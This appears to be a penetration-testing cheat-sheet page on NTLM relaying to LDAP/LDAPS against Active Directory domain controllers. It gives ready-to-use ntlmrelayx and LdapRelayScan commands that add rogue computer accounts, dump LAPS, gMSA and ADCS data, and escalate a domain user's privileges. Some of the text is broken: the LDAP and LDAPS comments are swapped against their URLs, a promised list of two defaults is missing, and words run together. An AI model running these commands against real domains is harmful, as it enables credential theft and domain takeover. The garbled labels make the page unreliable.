LDAP Relaying attacks can make use of NTLM authentication. Similar to SMB Relaying, an attacker who captures credentials via MITM6 or Responder can then relay them to a domain controller, targeting LDAP.
It should be noted that the following two defaults need to be set in order for this to be exploited:
LDAPRelayScan can be utilized to identify whether LDAP Signing and/or LDAP Channel Binding are enabled or not.
# Generic usage of LdapRelayScan.py
LdapRelayScan.py -u $user -p $password -dc-ip $dcipaddress -method BOTH{% tabs %}
{% tab title="Computer Creation" %}
Create a new domain computer by abusing the default attribute ms-DS-MachineAccountQuota which is by default set to 10, allowing all authenticated users to add up to 10 computers to the domain.
This account can then be utilized to perform authenticated attacks against the domain such as Kerberoasting.
# Relay to LDAP
ntlmrelayx.py -t ldaps://$dcip --add-computer $computername
# Relay to LDAPS
ntlmrelayx.py -t ldap://$dcip --add-computer $computername {% endtab %}
{% tab title="Dump" %} Relay authentication to LDAP and obtain a significant amount of information about the domain such as ADCS configuration, LAPS, groups, users, etc.
ntlmrelayx -t "ldap://$dcip" --dump-adcs --dump-laps --dump-gmsa{% endtab %}
{% tab title="Escalate" %} Relay captured credentials to LDAPS and escalate the privileges of a specified domain user.
# Relay authentication over LDAPS and attempt to escalate privileges
ntlmrelayx.py -t ldaps://$dcip --escalate-user $usernameLAReferences{% endtab %} {% endtabs %}
{% embed url="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" %}
{% embed url="https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/ldap-relay" %}
{% embed url="https://www.thehacker.recipes/ad/movement/ntlm/relay" %}
{% embed url="https://www.praetorian.com/blog/obtaining-laps-passwords-through-ldap-relaying-attacks/" %}